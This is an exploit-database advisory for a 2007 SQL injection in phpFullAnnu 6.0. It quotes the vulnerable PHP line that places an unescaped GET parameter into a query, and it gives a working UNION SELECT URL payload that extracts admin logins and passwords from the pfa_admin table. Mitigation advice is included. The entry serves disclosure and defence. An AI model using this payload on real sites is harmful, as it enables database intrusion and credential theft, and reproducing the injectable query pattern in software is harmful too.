phpFullAnnu (PFA) 6.0

vendor:

PFA

by:

Inclusion Hunter Team

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PFA

Affected Version From: 6

Affected Version To: 6

Patch Exists: NO

Related CWE:

CPE: a:pfa:pfa:6.0

Metasploit:

Other Scripts:

Platforms Tested:

2007

The vulnerability allows an attacker to inject SQL code into the application, potentially gaining unauthorized access to the database. The exploit provided demonstrates how to extract login credentials from the 'pfa_admin' table. This exploit only works if the 'magic_quotes_gpc' setting is turned off.

Mitigation:

To mitigate this vulnerability, enable 'magic_quotes_gpc' setting to automatically escape special characters in user input, or use prepared statements and parameterized queries to handle database queries.

Source

Exploit-DB raw data:

#########################################################################################
#
#        Inclusion Hunter Team
#        http://www.ihteam.net
#
#
#         [phpFullAnnu (PFA) 6.0]
#
#
# Class:     SQL Injection  # Found:     22/09/2007 # Remote:    Yes # Site:      http://pfa.netsliver.com/
# Download: http://pfa.netsliver.com/download/download.php?Fichier=pfa-v6.tgz
##########################################################################################



        Vulnerable code:
        index.php
============================================================================================================

$sqltitle = $bdd->readresult($bdd->request('SELECT h_title FROM
'.$tbprefix.'heading WHERE h_mod = \''.$_GET['mod'].'\''));
[...]
//in /include/meta.inc.php
<title><?php echo $title_site, ' - ', $sqltitle;...
//So watch Title bar to see the injection
============================================================================================================



        Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
===================================================================================================================

http://www.site.com/[path]/?lang=fr&mod=login' UNION ALL SELECT concat(a_login ,0x3a,a_password) FROM pfa_admin/*
===================================================================================================================



        Thanks To:
=================================
White_Sheep for his Bugs Hunter;
=================================

# milw0rm.com [2007-09-23]